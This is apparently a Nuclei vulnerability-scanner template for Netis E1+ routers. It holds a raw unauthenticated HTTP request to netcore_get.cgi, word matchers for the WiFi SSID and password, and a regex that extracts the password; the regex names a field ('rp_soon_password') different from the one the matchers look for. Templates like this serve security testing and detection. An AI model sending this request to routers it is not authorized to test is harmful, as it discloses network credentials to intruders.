46 lines
1.2 KiB
YAML
46 lines
1.2 KiB
YAML
id: netis-info-leak
|
|
|
|
info:
|
|
name: Netis E1+ V1.2.32533 - WiFi Password Disclosure
|
|
author: gy741
|
|
severity: high
|
|
description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48384
|
|
- https://www.netis-systems.com/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-200
|
|
metadata:
|
|
max-request: 1
|
|
tags: netis,exposure,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET //netcore_get.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: homeFirstShow=yes
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "rp_ap_password"
|
|
- "rp_ap_ssid"
|
|
part: body
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "'rp_soon_password':'([A-Za-z0-9]+)'"
|
|
|
|
# digest: 490a0046304402201aee40e66a8b9ac5c2eb1841ac03b371fc865aae754489211718c414be87445f0220455aa1806c02cf5b9497eb1016dbc58163d7e6d6837d60c37c98aab114c3f8ff:922c64590222798bb761d5b6d8e72950
|